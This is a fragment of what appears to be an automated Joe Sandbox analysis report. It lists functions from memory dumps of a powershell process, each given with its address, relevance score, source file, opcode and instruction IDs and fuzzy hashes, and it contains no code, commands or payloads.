                                                        • Opcode ID: f8cc47afc80795d4202e1109abb4ab9a1ef194444a205cad6bfaddeaa8d9d65c
                                                        • Instruction ID: aef5eb78f15aca5d3e0dc87edd5528ffb03768b9dc3a6c4ebb78042928f7a704
                                                        • Opcode Fuzzy Hash: f8cc47afc80795d4202e1109abb4ab9a1ef194444a205cad6bfaddeaa8d9d65c
                                                        • Instruction Fuzzy Hash: B021D0B23003169BEBE066A5889073BB6C6AFC4311F10C53AA585DB7C7DD71D885C760
                                                        Function 0708100D Relevance: .1, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1645552392.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7080000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a88c7108a85391a6f5e22d64060179960da8ae1a92547f557ed4ee64ef36765f
                                                        • Instruction ID: ef25b4d635a1c20774673dbc15e9498b96fb8816f5a96d07bb20654939acf825
                                                        • Opcode Fuzzy Hash: a88c7108a85391a6f5e22d64060179960da8ae1a92547f557ed4ee64ef36765f
                                                        • Instruction Fuzzy Hash: 49216BB13093CA6BEBB167754C107627FE55F82210F34456BE9E0DB283D5A484468761
                                                        Function 07080EE3 Relevance: .1, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1645552392.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7080000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ccc5efbadc2673e7c42186074c3cdb8a576ed49a2082f19bcf8aa5ab912f6c28
                                                        • Instruction ID: fcca750fc56c9824ba40781a39103476e4ca677275929d23a0bc36bc7b797c74
                                                        • Opcode Fuzzy Hash: ccc5efbadc2673e7c42186074c3cdb8a576ed49a2082f19bcf8aa5ab912f6c28
                                                        • Instruction Fuzzy Hash: DF21BBB2304386BBEBE0266588907767BD69F82310F188266A5C4DB7C3D974D889C771
                                                        Function 029B399D Relevance: .1, Instructions: 74COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1615221686.00000000029B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_29b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ae877e87176e6e8987f5bc78e27ab65935d1cb75a4d72935ac856a996321c768
                                                        • Instruction ID: 8b6fdfb9b78d13602ed4f6faac7677a600156c83824f10140f81bff9f0f7bde7
                                                        • Opcode Fuzzy Hash: ae877e87176e6e8987f5bc78e27ab65935d1cb75a4d72935ac856a996321c768
                                                        • Instruction Fuzzy Hash: 54217A74A0425A9FCB05CF58C9809AAFBF1FF49310B25819AE849E7762C731ED51CFA1
                                                        Function 029B4A90 Relevance: .1, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1615221686.00000000029B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_29b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 27bf50e93e85e61f2759b64d2c7d1f3ee769ead94cd0fa218fad8bd46c57d52a
                                                        • Instruction ID: 19f9a281c4a47355e87bde3044898162087f659670af5d18d7d9b2b4bae2aa4c
                                                        • Opcode Fuzzy Hash: 27bf50e93e85e61f2759b64d2c7d1f3ee769ead94cd0fa218fad8bd46c57d52a
                                                        • Instruction Fuzzy Hash: 50211974A002199FDB01CF99C994AAAFBB1FF48310B2481AAD909E7352C731ED41DFA1
                                                        Function 029B2F40 Relevance: .1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1615221686.00000000029B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_29b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2331202dc8f375c24dbe9da35f65f055f7eb4361f13053484886e83f5c2fac71
                                                        • Instruction ID: 01c73ac22572b5ba8037ebcf17a361fac870bd12f4b79d301640c5bdc6cc39e7
                                                        • Opcode Fuzzy Hash: 2331202dc8f375c24dbe9da35f65f055f7eb4361f13053484886e83f5c2fac71
                                                        • Instruction Fuzzy Hash: 56216D74A042099FCB01CF98D580AAEFBF5FF89310B1481A5E809EB352C731ED41CBA1
                                                        Function 07080C08 Relevance: .1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1645552392.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7080000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d682bdd72599dfc63556916e1ac0f60a6b529712d905d5f9a821ff712b4d580c
                                                        • Instruction ID: 640073f3f1e1903f1e6839d0dcee11e9c69dcf16bc74b1c77d2dff9d14209d91
                                                        • Opcode Fuzzy Hash: d682bdd72599dfc63556916e1ac0f60a6b529712d905d5f9a821ff712b4d580c
                                                        • Instruction Fuzzy Hash: 4D01477631031A8BC7E06A6A940027AF3D5DFC1622F14C03ED4D9C6310D632C84DC7A0
                                                        Function 029BF64B Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1615221686.00000000029B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_29b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a2a17ad66e0e50af2f6dc4f6a0563418e4e450a0add177bf48ef0f03b9f602fa
                                                        • Instruction ID: ff5c03b7b3fdafc76fbb80ca387214b1e21cac0b7c76397be44aab14653d5670
                                                        • Opcode Fuzzy Hash: a2a17ad66e0e50af2f6dc4f6a0563418e4e450a0add177bf48ef0f03b9f602fa
                                                        • Instruction Fuzzy Hash: 3F11A430D0014CDFDF2A9AA8DA887ECB775BF45319F14542AE801B69A0DB755885CF11
                                                        Function 029B4E6C Relevance: .0, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1615221686.00000000029B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_29b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e2e43b7700b59e9ef27c140abf55757c690f56fe314511ffccb6d3a840175787
                                                        • Instruction ID: 14ade568b60debed4d98bd1d4cbb3540510805f811308cb66d0e68ac9bd8820b
                                                        • Opcode Fuzzy Hash: e2e43b7700b59e9ef27c140abf55757c690f56fe314511ffccb6d3a840175787
                                                        • Instruction Fuzzy Hash: B011B974A01209EFDB06CB98D494BDDFBB2AF88214F28D555E405AB365C771A882CB80
                                                        Function 0708A5A9 Relevance: .0, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1645552392.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7080000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2fd1906955b0f0438404b48973268d338dcca77955502657d0fb70ca0bb823c3
                                                        • Instruction ID: 6df0d9b789610d351b6171ee63effe214b07bf1f42e3480dc77517cf1444f89e
                                                        • Opcode Fuzzy Hash: 2fd1906955b0f0438404b48973268d338dcca77955502657d0fb70ca0bb823c3
                                                        • Instruction Fuzzy Hash: B30126F2B013210FF36526A44C1176E67138BC1655B0186BBC9429FFC6CA658D5287EB
                                                        Function 0285D01D Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1614581077.000000000285D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0285D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_285d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8fd78450757cd6424a9b8d6b8ebc8c648c6deb1800eedf95cd2fee76ebfcad2c
                                                        • Instruction ID: ceaa1052408bc94695214127415b6ed694a45455672548adca62feda1467d839
                                                        • Opcode Fuzzy Hash: 8fd78450757cd6424a9b8d6b8ebc8c648c6deb1800eedf95cd2fee76ebfcad2c
                                                        • Instruction Fuzzy Hash: ED01263A404364DEF7208E21CCC4B67BBD8DF41228F08C01AEC489F242C3789886CBB2
                                                        Function 0285D01C Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1614581077.000000000285D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0285D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_285d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2026a9feb42f0a970fc72f2c1ae439641ec4cae57d7d2166833caed1c69e9505
                                                        • Instruction ID: 104ad8008658873253a84f86f553451ce40723648c45b11ae0c9e03a65e3bd11
                                                        • Opcode Fuzzy Hash: 2026a9feb42f0a970fc72f2c1ae439641ec4cae57d7d2166833caed1c69e9505
                                                        • Instruction Fuzzy Hash: 2BF0CD76405350AEE7208A16CDC4B63FBD8EF41238F18C15AED4C9E282C3799885CAB1
                                                        Function 029B2F15 Relevance: .0, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1615221686.00000000029B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_29b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bcbbe147380abf4b783fae10a079a889b0fd6c333ae6fce2b5fd7e94a047f8d3
                                                        • Instruction ID: b51680cdc5861f9b380949badb02baf5dd42eed8ef248401b7f0006fbf64e580
                                                        • Opcode Fuzzy Hash: bcbbe147380abf4b783fae10a079a889b0fd6c333ae6fce2b5fd7e94a047f8d3
                                                        • Instruction Fuzzy Hash: BCF09670B05245CFC705CB58D894AEDFB75EFC9214B148066D405D7252C7719C06C760
                                                        Function 070833A4 Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1645552392.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7080000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 42996f587742c2a3e0f4fb1ba28c8a4acdc41597c19596fbdf120318980cc808
                                                        • Instruction ID: 2aa2c4c00f776d157d98ee291cd2ed3fa3e17be223dfa54830afcf765bd5623f
                                                        • Opcode Fuzzy Hash: 42996f587742c2a3e0f4fb1ba28c8a4acdc41597c19596fbdf120318980cc808
                                                        • Instruction Fuzzy Hash: 49F065B02092819FC79AA660C861856FF70AFC760071D82CFD4C59F1A3CA669842C761
                                                        Function 029B35B7 Relevance: .0, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1615221686.00000000029B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_29b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6e27076db17714fa04cfba0176759c8eb180b14d5710ba612056547bd31fe9db
                                                        • Instruction ID: 60959936c72a491229492c681fc1b2a55375f195091ab61ddcd4c41a1ea643ce
                                                        • Opcode Fuzzy Hash: 6e27076db17714fa04cfba0176759c8eb180b14d5710ba612056547bd31fe9db
                                                        • Instruction Fuzzy Hash: 14E01A39A041048FDB14CB5CD9A0BE9F3B0EF88328F2081A9D91997291C763AD42CB44

                                                        Non-executed Functions

                                                        Function 0285D6E4 Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1614581077.000000000285D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0285D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_285d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4b51abeead9d0deb3f35cf43e94090ffc10e86a879c3c2b38aa86738228441a7
                                                        • Instruction ID: fbd6e593dbc844f9e5b159456ac37dc49b1854bb59428d06d2a04ac17085608b
                                                        • Opcode Fuzzy Hash: 4b51abeead9d0deb3f35cf43e94090ffc10e86a879c3c2b38aa86738228441a7
                                                        • Instruction Fuzzy Hash: 1221F57E504344DFEB05DF10D9C0B26BF65FB84314F24C5A9ED098B256C336D456CAA2